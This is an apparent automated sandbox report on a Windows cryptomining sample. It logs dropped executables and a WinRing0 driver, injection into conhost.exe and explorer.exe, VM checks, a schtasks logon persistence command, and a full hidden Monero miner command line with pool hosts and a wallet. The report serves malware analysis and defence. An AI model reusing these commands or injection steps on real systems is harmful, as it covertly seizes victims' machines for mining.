              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to behavior
              Source: WR64.sys.9.drBinary string: \Device\WinRing0_1_2_0
              Source: classification engineClassification label: mal100.evad.mine.winEXE@26/6@2/1
              Source: C:\Windows\System32\conhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: pcNCraWcRkJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\conhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: pcNCraWcRk.exeStatic file information: File size 2234368 > 1048576
              Source: pcNCraWcRk.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00623B00 push rax; retf
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00623BFF push rax; iretd
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_006238C0 push rax; retn 0009h
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeCode function: 0_2_00623AB7 push rax; retf 0009h
              Source: C:\Windows\System32\conhost.exeCode function: 1_2_0000025F5EDE0000 push es; iretd
              Source: C:\Windows\System32\conhost.exeCode function: 9_2_000002C94E0E0000 push es; iretd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409B00 push rax; retf
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_004098C0 push rax; retn 0009h
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409BFF push rax; iretd
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409AB7 push rax; retf 0009h
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A780EE0000 push es; iretd

              Persistence and Installation Behavior:

              barindex
              Sample is not signed and drops a device driverShow sources
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\services64.exeJump to dropped file
              Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Query firmware table information (likely to detect VMs)Show sources
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
              Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 35000
              Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
              Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeNetwork Connect: 198.23.214.117 144
              Source: C:\Windows\explorer.exeDomain query: xmr.givemexyz.in
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeMemory written: C:\Windows\System32\conhost.exe base: 25F5EDE0000
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 2C94E0E0000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 886010
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 2A780EE0000
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 16CC3390000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: DB8010
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeMemory allocated: C:\Windows\System32\conhost.exe base: 25F5EDE0000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2C94E0E0000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2A780EE0000 protect: page execute and read and write
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 16CC3390000 protect: page execute and read and write
              Injects a PE file into a foreign processesShow sources
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
              Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
              Injects code into the Windows Explorer (explorer.exe)Show sources
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140000000 value: 4D
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140001000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140367000 value: 1E
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 1404A0000 value: F0
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140753000 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140775000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140776000 value: C5
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140777000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 140779000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 14077B000 value: 60
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 14077C000 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 14077D000 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6764 base: 886010 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140000000 value: 4D
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140001000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140367000 value: 1E
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 1404A0000 value: F0
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140753000 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140775000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140776000 value: C5
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140777000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 140779000 value: 48
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 14077B000 value: 60
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 14077C000 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: 14077D000 value: 00
              Source: C:\Windows\System32\conhost.exeMemory written: PID: 6784 base: DB8010 value: 00
              Modifies the context of a thread in another process (thread injection)Show sources
              Source: C:\Windows\System32\conhost.exeThread register set: target process: 6764
              Source: C:\Windows\System32\conhost.exeThread register set: target process: 6784
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeThread created: C:\Windows\System32\conhost.exe EIP: 5EDE0000
              Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: 4E0E0000
              Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: 80EE0000
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeThread created: C:\Windows\System32\conhost.exe EIP: C3390000
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Users\user\Desktop\pcNCraWcRk.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: conhost.exe, 00000001.00000000.666772202.0000025F5F800000.00000002.00020000.sdmp, conhost.exe, 00000009.00000000.681287377.000002C94EBC0000.00000002.00020000.sdmp, conhost.exe, 0000000F.00000000.688171631.000002A781950000.00000002.00020000.sdmp, conhost.exe, 00000010.00000000.688097653.0000016CC39E0000.00000002.00020000.sdmpBinary or memory string: Progman
